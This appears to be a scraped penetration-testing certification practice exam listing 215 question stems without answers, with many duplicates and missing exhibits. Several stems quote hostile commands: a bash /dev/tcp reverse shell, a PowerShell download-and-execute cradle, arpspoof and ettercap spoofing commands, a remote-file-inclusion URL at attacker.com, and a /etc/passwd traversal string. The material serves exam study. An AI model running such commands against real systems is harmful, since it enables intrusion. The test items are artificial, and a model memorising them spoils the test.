EMT Practice Test

1. Question Content...


Question List

Question1: A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profile s. For which of the following types of attack would this information be used?

Question2: Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO)

Question3: If a security consultant comes across a password hash that resembles the following b117 525b3454 7Oc29ca3dBaeOb556ba8 Which of the following formats is the correct hash type?

Question4: An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO's login credentials. Which of the following types of attacks is this an example of?

Question5: An organization has requested that a penetration test be performed to determine if it is possible for an attacker to gain a foothold on the organization's server segment During the assessment, the penetration tester identifies tools that appear to have been left behind by a prior attack Which of the following actions should the penetration tester take?

Question6: Which of the following would be the BEST for performing passive reconnaissance on a target's external domain?

Question7: A recent vulnerability scan of all web servers in an environment offers the following results:

Taking a risk-based approach, which of the following is the BEST order to approach remediation based on exposure?

Question8: A penetration tester is reviewing the following output from a wireless sniffer:

Which of the following can be extrapolated from the above information?

Question9: Performance based
You are a penetration Inter reviewing a client's website through a web browser.
Instructions:
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate source or cookies.







Question10: A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes the finding. Which of the following techniques can the penetration tester perform to adjudicate the validity of the findings?

Question11: A penetration tester notices that the X-Frame-Optjons header on a web application is not set. Which of the following would a malicious actor do to exploit this configuration setting?

Question12: A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?

Question13: During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.
INSTRUCTIONS:
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.

Question14: A penetration tester successfully exploits a Windows host and dumps the hashes Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?
A)

B)

C)

D)

Question15: A company planned for and secured the budget to hire a consultant to perform a web application penetration test.
Upon discovered vulnerabilities, the company asked the consultant to perform the following tasks:
* Code review
* Updates to firewall setting

Question16: A manager calls upon a tester to assist with diagnosing an issue within the following Python script:
#!/usr/bin/python
s = "Administrator"
The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment Options may be used once or not at all

Question17: A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?

Question18: A client has voiced concern about the number of companies being branched by remote attackers, who are looking for trade secrets. Which of following BEST describes the types of adversaries this would identify?

Question19: A penetration tester is reviewing the following output from a wireless sniffer:

Which of the following can be extrapolated from the above information?

Question20: A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?

Question21: Which of the following tools can be used to perform a basic remote vulnerability scan of a website's configuration?

Question22: A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?
arpspoof -c both -r -t 192.168.1.1 192.168.1.20

Question23: If a security consultant comes across a password hash that resembles the following:
b117525b345470c29ca3d8ac0b556ba8
Which of the following formats is the correct hash type?

Question24: A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?

Question25: An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?

Question26: A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?

Question27: Which of the following is an important stakeholder to notify when penetration testing has begun?

Question28: Consider the following PowerShell command:
powershell.exe
IEX (New-Object Net.Webclient).downloadstring(http://site/
script.ps1");Invoke-Cmdlet
Which of the following BEST describes the actions performed this command?

Question29: Which of the following is an example of a spear phishing attack?

Question30: A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?

Question31: A penetration tester notices that the X-Frame-Optjons header on a web application is not set. Which of the following would a malicious actor do to exploit this configuration setting?

Question32: In a physical penetration tester testing scenario. the penetration tester obtains physical access to a laptop. The laptop is logged in but locked. Which of the following is a potential NEXT step to extract credentials from the device?

Question33: Which of the following types of physical security attacks does a mantrap mitigate-?

Question34: A system security engineer is preparing to conduct a security assessment of some new applications. The applications were provided to the engineer as a set that contains only JAR files. Which of the following would be the MOST detailed method to gather information on the inner working of these applications?

Question35: Click the exhibit button.

A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network Which of the following types of attacks should the tester stop?

Question36: A penetration tester is reviewing the following output from a wireless sniffer:

Which of the following can be extrapolated from the above information?

Question37: Which of the following is the BEST initial attack against an identified FTP server on the remote network?

Question38: A tester has captured a NetNTLMv2 hash using Responder Which of the following commands will allow the tester to crack the hash using a mask attack?

Question39: The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on the network architecture diagram, which was supplied at the beginning of the test. Which of the following are the MOST likely causes for this difference?
(Select TWO)

Question40: Which of the following commands starts the Metasploit database?

Question41: Which of the following commands starts the Metasploit database?

Question42: A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Give the below code and output Import requests from BeautifulSoup import BeautifulSoup request = requests.get ("https://www.bank.com/admin") respHeaders, respBody = request[0]. Request[1] if respHeader.statuscode == 200:
soup = BeautifulSoup (respBody)
soup = soup.FindAll ("div", ("type" : "hidden"))
print respHeader. StatusCode, StatusMessage
else:
print respHeader. StatusCode, StatusMessage
Output: 200 OK
Which of the following is the tester intending to do?

Question43: A malicious user wants to perform an MITM attach on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?

Question44: A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?

Question45: A penetration tester locates a few unquoted service paths during an engagement.
Which of the following can the tester attempt to do with these?

Question46: Which of Ihe following commands would allow a penetration tester to access a private network from the Internet in Metasploit?

Question47: During testing, a critical vulnerability is discovered on a client's core server.
Which of the following should be the NEXT action?

Question48: A security assessor completed a comprehensive penetration test of a company and its networks and systems.
During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company's intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact?

Question49: During a physical security review, a detailed penetration testing report was obtained, which was issued to a security analyst and then discarded in the trash. The report contains validated critical risk exposures.
Which of the following processes would BEST protect this information from being disclosed in the future?

Question50: During an internal network penetration test, a tester recovers the NTLM password hash for a user known to have full administrator privileges on a number of target systems. Efforts to crack the hash and recover the plaintext password have been unsuccessful.
Which of the following would be the BEST target for continued exploitation efforts?

Question51: A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?

Question52: The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on the network architecture diagram, which was supplied at the beginning of the test. Which of the following are the MOST likely causes for this difference? (Select TWO)

Question53: A security team is switching firewall vendors. The director of security wants to scope a penetration test to satisfy requirements to perform the test after major architectural changes.
Which of the following is the BEST way to approach the project?

Question54: A security analyst was provided with a detailed penetration report, which was performed against the organization's DMZ environment. It was noted on the report that a finding has a CVSS base score of 10.0.
Which of the following levels of difficulty would be required to exploit this vulnerability?

Question55: A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for the penetration tester to take?

Question56: A security consultant is trying to attack a device with a previously identified user account.

Which of the following types of attacks is being executed?

Question57: Click the exhibit button.

Given the Nikto vulnerability, scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Choose two.)

Question58: Black box penetration testing strategy provides the tester with:

Question59: A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks can be performed to leverage this vulnerability?

Question60: At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?

Question61: D18912E1457D5D1DDCBD40AB3BF70D5D
Which of the following is the MOST comprehensive type of penetration test on a network?

Question62: A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

Question63: A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

Question64: When performing compliance-based assessments, which of the following is the MOST important Key consideration?

Question65: A penetration tester is performing a code review against a web application Given the following URL and source code:

Which of the following vulnerabilities is present in the code above?

Question66: The following command is run on a Linux file system:
Chmod 4111 /usr/bin/sudo
Which of the following issues may be exploited now?

Question67: Which of the following would be BEST for performing passive reconnaissance on a target's external domain?

Question68: A penetration tester wants to target NETBIOS name service. Which of the following is the most likely command to exploit the NETBIOS name service?

Question69: A penetration tester runs the following from a compromised box 'python -c -import pty;Pty.sPawn(
"/bin/bash").' Which of the following actions is the tester taking?

Question70: Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented Each password may be used only once

Question71: A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovered vulnerabilities, the company asked the consultant to perform the following tasks:
* Code review
* Updates to firewall setting

Question72: An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used m this attack?

Question73: During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikazt. Which of the following registry changes would allow for credential caching in memory?
A)

B)

C)

D)

Question74: Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?

Question75: Consider the following PowerShell command:
Powershell.exe IEX (New-Object Net.Webclient).downloadstring (http:// site/script.ps1"); Invoke-Cmdlet Which of the following BEST describes the actions performed this command?

Question76: A technician is reviewing the following report. Given this information, identify which vulnerability can be definitively confirmed to be a false positive by dragging the "false positive" token to the "Confirmed" column for each vulnerability that is a false positive.

Question77: A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?

Question78: A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?

Question79: An attacker receives a DHCP address and notices the hostname was populated in the corporate DNS server. Which of the following BEST describes how the attacker can use this information?

Question80: Which of the following types of intrusion techniques is the use of an "under-the-door tool" during a physical security assessment an example of?

Question81: A penetration tester wants to check manually if a "ghost" vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?

Question82: When considering threat actor scoping prior to an engagement, which of the following characteristics makes an APT challenging to emulate?

Question83: Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?

Question84: Which of the following BEST describes why an MSA is helpful?

Question85: Which of the following tools is used to perform a credential brute force attack?

Question86: A penetration tester is reviewing a Zigbee Implementation for security issues. Which of the following device types is the tester MOST likely testing?

Question87: A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application.
Which of the following would be the BEST remediation strategy?

Question88: A penetration tester identifies the following findings during an external vulnerability scan:

Which of the following attack strategies should be prioritized from the scan results above?

Question89: While engaging clients for a penetration test from highly regulated industries, which of the following is usually the MOST important to the clients from a business perspective?

Question90: While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Which of the following remediation steps should be taken to prevent this type of attack?

Question91: An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email m to obtain the CEO s login credentials Which of the following types of attacks is this an example of?

Question92: In a physical penetration testing scenario, the penetration tester obtains physical access to a laptop following .s a potential NEXT step to extract credentials from the device?

Question93: A penetration tester is checking a script to determine why some basic math errors are persisting. The expected result was the program outputting "True".

Given the output from the console above, which of the following explains how to correct the errors in the script?
(Choose two.)

Question94: After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the BEST control to remediate the use of common dictionary terms?

Question95: A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?

Question96: After successfully enumerating users on an Active Directory domain controller using enum4linux a penetration tester wants to conduct a password-guessing attack Given the below output:

Which of the following can be used to extract usernames from the above output prior to conducting the attack?

Question97: A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?

Question98: A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL:

Question99: A penetration tester is performing a wireless penetration test. Which of the following are some vulnerabilities that might allow the penetration tester to easily and quickly access a WPA2-protected access point?

Question100: A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5. Which of the following commands will test if the VPN is available?

Question101: Click the exhibit button.

Given the Nikto vulnerability scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Select TWO)

Question102: While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?

Question103: During a physical security review, a detailed penetration testing report was obtained, which was issued to a security analyst and then discarded in the trash. The report contains validated critical risk exposures. Which of the following processes would BEST protect this information from being disclosed in the future?

Question104: A penetration tester needs to provide the code used to exploit a DNS server in the final report. In which of the following parts of the report should the penetration tester place the code?

Question105: Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe ism looking for a method that will enable him to enter the building during business hours or when there are no employee on-site. Which of the following would be MOST effective in accomplishing this?

Question106: A penetration tester is in the process of writing a report that outlines the overall level of risk to operations.
In which of the following areas of the report should the penetration tester put this?

Question107: A tester intends to run the following command on a target system:
bash -i >& /dev/tcp/10.2.4.6/443 0>&1
Which of the following additional commands would need to be executed on the tester's Linux system .o make (he pre*ous command success?

Question108: You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.

Question109: Instructions:
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the reset all button.
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

Question110: Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?

Question111: A client has scheduled a wireless penetration test. Which of the following describes the scoping target information MOST likely needed before testing can begin?

Question112: A penetration tester is checking a script to determine why some basic math errors are persisting. The expected result was the program outputting "True".

Given the output from the console above, which of the following explains how to correct the errors in the script? (Choose two.)

Question113: A penetration tester is planning to conduct a distributed dictionary attack on a government domain against the login portal. The tester will leverage multiple proxies to mask the origin IPs of the attack. Which of the following threat actors will be emulated?

Question114: A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds two log entries for the badge in the following has MOST likely occurred?

Question115: A penetration tester is performing a wireless penetration test.
Which of the following are some vulnerabilities that might allow the penetration tester to easily and quickly access a WPA2-protected access point?

Question116: Given the following Python script:

Which of the following actions will it perform?

Question117: A company's corporate policies state that employees are able to scan any global network as long as it is done within working hours. Government laws prohibit unauthorized scanning. Which of the following should an employee abide by?

Question118: A penetration tester discovers Heartbleed vulnerabilities in a target network Which of the following impacts would be a result of exploiting this vulnerability?

Question119: A penetration tester successfully exploits a system, receiving a reverse shell. Which of the following is a Meterpreter command that is used to harvest locally stored credentials?

Question120: During an engagement, a consultant identifies a number of areas that need further investigation and require an extension of the engagement. Which of the following is the MOST likely reason why the engagement may not be able to continue?

Question121: : 88
A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?

Question122: A security consultant is trying to attack a device with a previous identified user account.

Which of the following types of attacks is being executed?

Question123: A penetration tester has discovered through automated scanning that a Tomcat server allows for the use of default credentials. Using default credentials, the tester is able to upload WAR files to the server.
Which of the following is the MOST likely post-exploitation step?

Question124: A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?

Question125: Which of the following commands will allow a tester to enumerate potential unquoted services paths on a host?

Question126: A consultant is attempting to harvest credentials from unsecure network protocols in use by the organization.
Which of the following commands should the consultant use?

Question127: A penetration tester is reviewing a Zigbee implementation for security issues. Which of the following device types is the tester MOST likely testing?

Question128: Which of the following tools is used to perform a credential brute force attack?

Question129: A technician is reviewing the following report. Given this information, identify which vulnerability can be definitively confirmed to be a false positive by dragging the "false positive" token to the "Confirmed" column for each vulnerability that is a false positive.

Question130: A penetration tester reviews the scan results of a web application.
Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

Question131: Which of the following are MOST important when planning for an engagement? (Select TWO).

Question132: DRAG DROP
A manager calls upon a tester to assist with diagnosing an issue within the following Python script:
#!/usr/bin/python
s = "Administrator"
The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment Options may be used once or not at all

Question133: Given the following script:

Which of the following BEST describes the purpose of this script?

Question134: A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?

Question135: A manager calls upon a tester to assist with diagnosing an issue within the following Python script:
#!/usr/bin/python
s = "Administrator"
The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment Options may be used once or not at all

Question136: A manager calls upon a tester to assist with diagnosing an issue within the following Python script:
#!/usr/bin/python
s = "Administrator"
The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment Options may be used once or not at all

Question137: A penetration tester is reviewing a Zigbee Implementation for security issues. Which of the following device types is the tester MOST likely testing?

Question138: A penetration tester has gained a root shell on a target Linux server and wants to have the server "check in" over HTTP using a GET request to the penetration tester's laptop once every hour, even after system reboots. The penetration tester wrote a bash script to perform this. Which of the following represents the BEST method to persist the script?

Question139: A client needs to be PCI compliant and has external-facing web servers.
Which of the following CVSS vulnerability scores would automatically bring the client out of compliance standards such as PCI 3.x?

Question140: Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?

Question141: A penetration tester identifies the following findings during an external vulnerability scan:

Which of the following attack strategies should be prioritized from the scan results above?

Question142: A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?

Question143: During an internal network penetration test, a tester recovers the NTLM password hash tor a user known to have full administrator privileges on a number of target systems Efforts to crack the hash and recover the plaintext password have been unsuccessful Which of the following would be the BEST target for continued exploitation efforts?

Question144: A penetration tester is performing a remote internal penetration test by connecting to the testing system from the Internet via a reverse SSH tunnel. The testing system has been placed on a general user subnet with an IP address of 192.168.1.13 and a gateway of 192.168.1.1. Immediately after running the command below, the penetration tester's SSH connection to the testing platform drops:

Which of the following ettercap commands should the penetration tester use in the future to perform ARP spoofing while maintaining a reliable connection?
# sudo ettercap -Tq -w output.cap -M ARP /192.168.1.0/ /192.168.1.255/

Question145: A penetration tester identifies the following findings during an external vulnerability scan:

Which of the following attack strategies should be prioritized from the scan results above?

Question146: During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikazt. Which of the following registry changes would allow for credential caching in memory?
A)

B)

C)

D)

Question147: A penetration tester generates a report for a host-based vulnerability management agent that is running on a production web server to gather a list of running processes. The tester receives the following information.

Which of the following processes MOST likely demonstrates a lack of best practices?

Question148: A penetration tester runs the following from a compromised box 'python -c -import pty;Pty.sPawn( "/bin/bash").' Which of the following actions is the tester taking?

Question149: A penetration tester has been asked to conduct OS fingerprinting with Nmap using a company-provide text file that contain a list of IP addresses.
Which of the following are needed to conduct this scan? (Select TWO).

Question150: A penetration tester is connected to a client's local network and wants to passively identify cleartext protocols and potentially sensitive data being communicated across the network. Which of the following is the BEST approach to take?

Question151: A penetration tester successfully exploits a Windows host and dumps the hashes Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?
A)

B)

C)

D)

Question152: Which of the following CPU register does the penetration tester need to overwrite in order to exploit a simple butter overflow?

Question153: A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for penetration?

Question154: A penetration tester is performing a code review against a web application Given the following URL and source code:

Which of the following vulnerabilities is present in the code above?

Question155: Instructions:
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the reset all button.
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

Question156: A tester identifies an XSS attack vector during a penetration test. Which of the following flags should the tester recommend to prevent a JavaScript payload from accessing the cookie?

Question157: A penetration tester has obtained access to an IP network subnet that contains ICS equipment intercommunication. Which of the following attacks is MOST likely to succeed in creating a physical effect?

Question158: A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes the finding. Which of the following techniques can the penetration tester perform to adjudicate the validity of the findings?

Question159: During an internal network penetration test the tester is able to compromise a Windows system and recover the NTLM hash for a local wrltsrnAdrain account Attempting to recover the plaintext password by cracking the hash has proved to be unsuccessful, and the tester has decided to try a pass-the-hash attack to see if the credentials are reused on other in-scope systems Using the Medusa tool the tester attempts to authenticate to a list of systems, including the originally compromised host, with no success Given the output below:

Which of the following Medusa commands would potentially provide better results?

Question160: Which of the following wordlists is BEST for cracking MD5 password hashes of an application's users from a compromised database?

Question161: A company decides to remediate issues identified from a third-party penetration test done to its infrastructure.
Management should instruct the IT team to:

Question162: A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?

Question163: A client's systems administrator requests a copy of the report from the penetration tester, but the systems administrator is not listed as a point of contact or signatory.
Which of the following is the penetration tester's BEST course of action?

Question164: Given the following script:

Which of the following BEST describes the purpose of this script?

Question165: A security consultant found a SCADA device in one of the VLANs in scope. Which of the following actions would BEST create a potentially destructive outcome against device?

Question166: A penetration tester has compromised a system and wishes to connect to a port on it from the attacking machine to control the system Which of the following commands should the tester run on the compromised system?

Question167: When negotiating a penetration testing contract with a prospective client, which of the following disclaimers should be included in order to mitigate liability in case of a future breach of the client's systems?

Question168: A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?

Question169: After successfully exploiting a local file inclusion vulnerability within a web application a limited reverse shell is spawned back to the penetration tester's workstation Which of the following can be used to escape the limited shell and create a fully functioning TTY?

Question170: A penetration tester executes the following commands:
C:\>%userprofile%\jtr.exe
This program has been blocked by group policy
C:\> accesschk.exe -w -s -q -u Users C:\Windows
rw C:\Windows\Tracing
C:\>copy %userprofile%\jtr.exe C:\Windows\Tracing
C:\Windows\Tracing\jtr.exe
jtr version 3.2...
jtr>
Which of the following is a local host vulnerability that the attacker is exploiting?

Question171: Given the following Python script:

Which of the following actions will it perform?

Question172: A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?

Question173: A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.6. Which of the following commands will test if the VPN is available?

Question174: A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?

Question175: A security consultant is trying to attack a device with a previously identified user account.

Which of the following types of attacks is being executed?

Question176: Click the exhibit button.

A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?

Question177: While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?

Question178: A client gives a penetration tester a /8 network range to scan during a week-long engagement. Which of the following tools would BEST complete this task quickly?

Question179: A penetration tester is connected to a client's local network and wants to passively identify cleartext protocols and potentially sensitive data being communicated across the network. Which of the following is the BEST approach to take?

Question180: During the information gathering phase of a network penetration test for the corp.local domain, which of the following commands would provide a list of domain controllers?

Question181: During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?

Question182: When conducting reconnaissance against a target, which of the following should be used to avoid directory communicating with the target?

Question183: An organization has requested that a penetration test be performed to determine if it is possible for an attacker to gain a foothold on the organization's server segment During the assessment, the penetration tester identifies tools that appear to have been left behind by a prior attack Which of the following actions should the penetration tester take?

Question184: A security consultant is trying to attack a device with a previously identified user account.

Which of the following types of attacks is being executed?

Question185: DRAG DROP
Performance based
You are a penetration Inter reviewing a client's website through a web browser.
Instructions:
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate source or cookies.







Question186: A tester has captured a NetNTLMv2 hash using Responder Which of the following commands will allow the tester to crack the hash using a mask attack?

Question187: Instructions:
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the reset all button.
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

Question188: Which of the following has a direct and significant impact on the budget of the security assessment?

Question189: Click the exhibit button.

A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?

Question190: A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer?

Question191: A penetration tester directly connects to an internal network. Which of the following exploits would work BEST for quick lateral movement within an internal network?

Question192: Which of the following types of intrusion techniques is the use of an "under-the-door tool" during a physical security assessment an example of?

Question193: During a vulnerability assessment, the security consultant finds an XP legacy system that is running a critical business function. Which of the following mitigations is BEST for the consultant to conduct?

Question194: Given the following:
http://example.com/download.php?id-.../.../.../etc/passwd
Which of the following BEST describes the above attack?

Question195: Performance based
You are a penetration Inter reviewing a client's website through a web browser.
Instructions:
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate source or cookies.







Question196: A client needs to be PCI compliant and has external-facing web servers. Which of the following CVSS vulnerability scores would automatically bring the client out of compliance standards such as PCI 3.x?

Question197: A malicious user wants to perform an MITM attach on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?

Question198: A penetration tester is preparing to conduct API testing Which of the following would be MOST helpful in preparing for this engagement?

Question199: The scope of a penetration test requires the tester to be stealthy when performing port scans. Which of the following commands with Nmap BEST supports stealthy scanning?

Question200: During a penetration test, a host is discovered that appears to have been previously compromised and has an active outbound connection. After verifying the network activity is malicious, which of the following should the tester do?

Question201: A security consultant is trying to attack a device with a previous identified user account.

Which of the following types of attacks is being executed?

Question202: Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe ism looking for a method that will enable him to enter the building during business hours or when there are no employee on-site. Which of the following would be MOST effective in accomplishing this?

Question203: Instructions:
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.

Question204: Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?

Question205: An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used m this attack?

Question206: A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network. The tester is monitoring the correct channel for the identified network, but has been unsuccessful in capturing a handshake. Given the scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?

Question207: A penetration testet is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network The (ester is monitoring the correct channel tor the identified network but has been unsuccessful in capturing a handshake Given this scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?

Question208: A penetration tester ran the following Nmap scan on a computer:
nmap -aV 192.168.1.5
The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH. Which of the following is the BEST explanation for what happened?

Question209: Click the exhibit button.

Given the Nikto vulnerability, scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Choose two.)

Question210: A penetration tester observes that several high-numbered ports are listening on a public web server.
However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?

Question211: A penetration tester has identified a directory traversal vulnerability. Which of the following payloads could have helped the penetration tester identify this vulnerability?

Question212: An internal network penetration test is conducted against a network that is protected by an unknown NAC system In an effort to bypass the NAC restrictions the penetration tester spoofs the MAC address and hostname of an authorized system Which of the following devices if impersonated would be MOST likely to provide the tester with network access?

Question213: A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?

Question214: A financial institution is asking a penetration tester to determine if collusion capabilities to produce wire fraud are present. Which of the following threat actors should the penetration tester portray during the assessment?

Question215: Which of the following is an example of a spear phishing attack?

